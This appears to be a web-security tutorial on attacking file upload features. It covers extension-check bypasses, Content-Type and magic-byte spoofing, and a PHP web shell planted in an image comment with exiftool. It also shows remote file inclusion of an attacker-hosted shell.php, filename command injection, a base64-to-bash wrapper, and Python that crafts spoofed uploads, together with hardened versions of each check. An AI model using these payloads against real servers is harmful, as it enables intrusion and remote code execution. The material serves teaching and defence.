Intro

File upload is a popular attack vector in web applications that support it. In this case study we look at several common attack techniques against file upload functionality and how they are usually exploited.

Bypass client side filters

This scenario is very straightforward: client-side checks (JavaScript validation, the accept attribute on the file input) run in the attacker's browser and can be disabled, edited, or skipped entirely by sending the request to the backend endpoint directly, for example with curl or an intercepting proxy. Client-side validation is a usability feature only; the server must validate every upload independently.

Bypass extension checks

This check comes in two forms: allow listing (only known-good extensions are accepted) and deny listing (known-bad extensions are rejected).

For allow listing, consider bypassing with:

  • Null byte: e.g. evil.php%00.jpg. The extension check, written in the web language, sees ".jpg", but if the name is later handed to a C string API the string ends at the NUL, so the file is written as evil.php. This only works on runtimes that do not reject embedded NUL bytes in filenames (historically PHP before 5.3.4).
  • Double extension: e.g. evil.php.jpg. A check that only inspects the final extension passes it, while Apache configured with AddHandler application/x-httpd-php .php executes any file with .php anywhere in its name, because mod_mime evaluates every extension. Distributions that map PHP with an anchored FilesMatch pattern (\.php$) are not affected.
  • Unrecognised extension: e.g. evil.php.invalid. mod_mime ignores extensions it does not know, so .php still selects the PHP handler. This gets past checks that only reject a known-bad final extension or use an unanchored pattern, but not a strict allow list on the last extension.

For deny listing, consider bypassing with:

  • Case variation, e.g. evil.PhP, when the deny list compares case-sensitively but the web server maps handlers case-insensitively (Apache does by default)
  • Flaws in the regex, e.g. missing anchors or an unescaped dot; test candidate names against the pattern with this online tool: https://www.regextester.com/
  • Alternative extensions the server also maps to the interpreter, e.g. instead of .php try .phar or .phtml (which ones apply depends on the server's handler configuration)
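The checks above, modelled in code. This is an added example, not code from the original page: the flawed checks are the typical patterns the bullets describe, apache_addhandler_mapping is a simplified model of mod_mime with an AddHandler-style PHP mapping (the set of mapped extensions is an assumption), as_seen_by_c_api models a NUL-terminated string API, and hardened_upload_name is one way to write the check correctly.

```python
import os
import re
import secrets
from typing import Optional

ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

# --- typical flawed checks -------------------------------------------------

def naive_allow_list(filename: str) -> bool:
    """Only looks at the final extension, e.g. filename.endswith('.jpg')."""
    return filename.lower().endswith(tuple("." + e for e in ALLOWED_IMAGE_EXTS))

def naive_deny_list(filename: str) -> bool:
    """Case-sensitive deny list on the final extension."""
    return not filename.endswith(".php")

def unanchored_regex_check(filename: str) -> bool:
    """Allow-list regex without a trailing anchor: matches anywhere in the name."""
    return re.search(r"\.(jpe?g|png|gif)", filename) is not None

# --- what happens after the check ------------------------------------------

def as_seen_by_c_api(filename: str) -> str:
    """A NUL-terminated C string API stops reading at the first NUL byte.
    Models runtimes that passed names through unchecked (historically PHP < 5.3.4)."""
    return filename.split("\x00", 1)[0]

PHP_HANDLER_EXTS = {"php", "phar", "phtml"}  # assumed AddHandler mapping for this example

def apache_addhandler_mapping(filename: str) -> Optional[str]:
    """Simplified model of Apache mod_mime with an AddHandler-style PHP mapping:
    every dot-separated extension is examined case-insensitively, unknown ones
    are ignored, and a mapped extension anywhere in the name selects the handler."""
    for ext in filename.split(".")[1:]:
        if ext.lower() in PHP_HANDLER_EXTS:
            return "application/x-httpd-php"
    return None  # served as a static file

# --- a hardened check --------------------------------------------------------

def hardened_upload_name(filename: str) -> Optional[str]:
    """Return the name to store the file under, or None to reject.
    Exactly one extension, lower-cased, strict allow list, no NUL bytes, and the
    stored name is random so the client never chooses it."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:
        return None
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if m is None:
        return None
    ext = m.group(1).lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        return None
    return f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    for name in ["evil.php.jpg", "evil.php\x00.jpg", "evil.jpg.php", "evil.PhP", "evil.phar"]:
        print(f"{name!r:22} allow={naive_allow_list(name)!s:5} deny={naive_deny_list(name)!s:5} "
              f"regex={unanchored_regex_check(name)!s:5} handler={apache_addhandler_mapping(name)} "
              f"hardened={hardened_upload_name(name)}")
```

Each flawed check passes at least one of the names while the server model still hands the file to the PHP handler; the hardened version rejects all of them and accepts a plain photo.jpg under a random name.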

Content-type

Content-Type is a header on each part of the multipart request (and on the request itself) that tells the server what kind of content to expect. It is set by the client, so it can be changed freely before the request reaches the server.

If the server trusts this header and never inspects the bytes, we can upload a script while declaring it to be an image:

Content-Disposition: form-data; name="image"; filename="evil.php"
Content-Type: image/gif
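Crafting the request by hand makes the point of both the client-side bypass above and the Content-Type tampering just shown: the filename and the per-part Content-Type are plain strings chosen by whoever builds the body. This is an added example, not code from the original page; it uses only the Python standard library, and server_view uses the email parser to show what a server that trusts the declared metadata would see.

```python
import email
import email.policy
import http.client
import secrets
import urllib.parse
from typing import Dict, List, Tuple

FileSpec = Tuple[str, str, str, bytes]  # (field name, filename, Content-Type, data)

def build_multipart(fields: Dict[str, str], files: List[FileSpec]) -> Tuple[str, bytes]:
    """Hand-build a multipart/form-data body. Every value here, including the
    filename and the per-part Content-Type, is chosen by the client."""
    boundary = "----Boundary" + secrets.token_hex(12)
    chunks: List[bytes] = []
    for name, value in fields.items():
        chunks += [f"--{boundary}".encode(),
                   f'Content-Disposition: form-data; name="{name}"'.encode(),
                   b"", value.encode()]
    for name, filename, ctype, data in files:
        chunks += [f"--{boundary}".encode(),
                   f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
                   f"Content-Type: {ctype}".encode(),
                   b"", data]
    chunks += [f"--{boundary}--".encode(), b""]
    return f"multipart/form-data; boundary={boundary}", b"\r\n".join(chunks)

def upload(url: str, fields: Dict[str, str], files: List[FileSpec], timeout: float = 10) -> Tuple[int, bytes]:
    """POST the body straight to the backend endpoint, skipping the page's JavaScript."""
    u = urllib.parse.urlsplit(url)
    ctype, body = build_multipart(fields, files)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.netloc, timeout=timeout)
    conn.request("POST", u.path or "/", body=body,
                 headers={"Content-Type": ctype, "Content-Length": str(len(body))})
    resp = conn.getresponse()
    return resp.status, resp.read()

def server_view(ctype: str, body: bytes) -> List[Tuple[str, str, bytes]]:
    """What a server that trusts declared metadata sees for each file part:
    (filename, declared Content-Type, raw bytes). The email parser handles any multipart/* body."""
    msg = email.message_from_bytes(f"Content-Type: {ctype}\r\n\r\n".encode() + body,
                                   policy=email.policy.default)
    parts = []
    for part in msg.iter_parts():
        if part.get_filename():
            parts.append((part.get_filename(), part.get_content_type(), part.get_payload(decode=True)))
    return parts

if __name__ == "__main__":
    # constructed request: a PHP script declared as a GIF
    ctype, body = build_multipart({"submit": "Upload"},
                                  [("image", "evil.php", "image/gif", b"<?php phpinfo(); ?>")])
    for filename, declared, data in server_view(ctype, body):
        print(f"{filename}: declared {declared}, bytes {data[:16]!r}")
    # upload("http://target.example/upload.php", {"submit": "Upload"}, [...])  # sends it for real
```

Nothing in the declared metadata is verified against the bytes; a server that branches on part.get_content_type() alone accepts the script as an image.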

Some servers only check the first bytes of the file (the magic bytes); these can be tricked by including the GIF89a image header in front of the payload, since PHP executes whatever sits between <?php and ?> regardless of what precedes it:

GIF89a;
<?php phpinfo(); ?>

You can also inject the payload into the comment field of a genuine image, which survives magic-byte checks and dimension checks such as getimagesize() (note the double quotes around cmd: single quotes would end the shell argument early):

> exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' evil.jpg

Re-encoding the upload with an image library discards such metadata, which is why re-encoding is the usual server-side defence.

Using FI

Sometimes a server exposes a file inclusion vulnerability, where a user-controlled parameter ends up in an include or require. If remote inclusion is enabled (allow_url_include in PHP), we can make it load a script we host:

http://target.com/?path=http://<attacker>/shell.php

Even when only local inclusion is possible it combines well with upload: including a file we uploaded earlier executes the PHP it contains regardless of its extension.
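The vulnerable pattern and one hardened form, written as an added example in Python rather than the page's PHP (not code from the original page): vulnerable_resolve mirrors include($_GET['path']), while hardened_resolve treats the parameter as a key into an allow list, rejects anything with a URL scheme, and confirms the final path stays inside the template directory. The directory layout and page table are assumptions for the example.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

TEMPLATE_DIR = "/var/www/app/templates"            # assumed layout for this example
PAGES = {"home": "home.php", "about": "about.php"}  # assumed allow list

def vulnerable_resolve(path_param: str) -> str:
    """Mirrors include($_GET['path']): the client's string is the include target,
    so a remote URL (with allow_url_include on), a traversal path, or a previously
    uploaded file all end up being executed."""
    return path_param

def hardened_resolve(page_param: str, base_dir: str = TEMPLATE_DIR) -> Optional[str]:
    """Return an absolute path under base_dir, or None to reject."""
    if urlsplit(page_param).scheme:                 # no http://, php://, data:, ...
        return None
    target = PAGES.get(page_param)                  # the parameter is a key, never a path
    if target is None:
        return None
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, target))
    if os.path.commonpath([root, full]) != root:    # belt and braces against traversal
        return None
    return full

if __name__ == "__main__":
    for p in ["home", "http://attacker.example/shell.php", "../../uploads/evil.jpg", "php://input"]:
        print(f"{p!r:40} vulnerable -> {vulnerable_resolve(p)!r:40} hardened -> {hardened_resolve(p)!r}")
```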

Command injection for image upload

Sometimes a server processes uploaded images (resizing, thumbnailing, stripping metadata), which usually means invoking tools on the filesystem such as exiftool or ImageMagick. There are well-known public exploits for older versions of these tools, so identify the version in use and check it against public advisories. The more mundane bug is just as common: the uploaded filename is spliced into a shell command line without escaping.

If a payload doesn't work because special characters (quotes, spaces, pipes) are filtered or mangled, base64-encoding it and decoding on the target usually helps:

> echo <base64-payload> | base64 -d | bash
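The command-injection pattern and the base64 wrapper, as an added example that is not code from the original page. The "processing" command uses echo and printf as stand-ins for exiftool or convert so that it runs anywhere; the bug being shown is the string interpolation into a shell, not anything specific to those tools. The hostile filename is constructed for the demo.

```python
import base64
import shlex
import subprocess

def process_image_vulnerable(filename: str) -> str:
    """The pattern behind many image-pipeline injections: the uploaded filename
    is spliced into a shell command string. `echo` stands in for the real tool."""
    cmd = f"echo processing {filename}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def process_image_hardened(filename: str) -> str:
    """argv list, no shell: the name is one argument however many metacharacters
    it contains. With real tools also pass '--' before the filename so a name
    starting with '-' is not parsed as an option."""
    return subprocess.run(["printf", "processing %s\n", filename],
                          capture_output=True, text=True).stdout

def quoted_for_shell(filename: str) -> str:
    """If a shell really is unavoidable, quote with shlex.quote, never an f-string."""
    return f"echo processing {shlex.quote(filename)}"

def wrap_base64(command: str, shell: str = "bash") -> str:
    """Encode a payload so the transmitted string carries no quotes, spaces or
    pipes of its own; the target decodes it and pipes it into a shell."""
    enc = base64.b64encode(command.encode()).decode("ascii")
    return f"echo {enc} | base64 -d | {shell}"

def run_wrapped(command: str, shell: str = "sh") -> str:
    """Execute the wrapped form the way the target would, returning its stdout."""
    return subprocess.run(["sh", "-c", wrap_base64(command, shell)],
                          capture_output=True, text=True).stdout

if __name__ == "__main__":
    hostile = "pic.jpg; echo INJECTED"          # constructed filename for the demo
    print(process_image_vulnerable(hostile))   # second line reads INJECTED
    print(process_image_hardened(hostile))     # one line, the name printed literally
    print(quoted_for_shell(hostile))
    print(wrap_base64("id; uname -a"))
```

The vulnerable function executes the injected echo; the hardened one prints the whole name as data. wrap_base64 shows why the base64 form survives filters: the only characters left are [A-Za-z0-9+/=] plus the fixed decode pipeline.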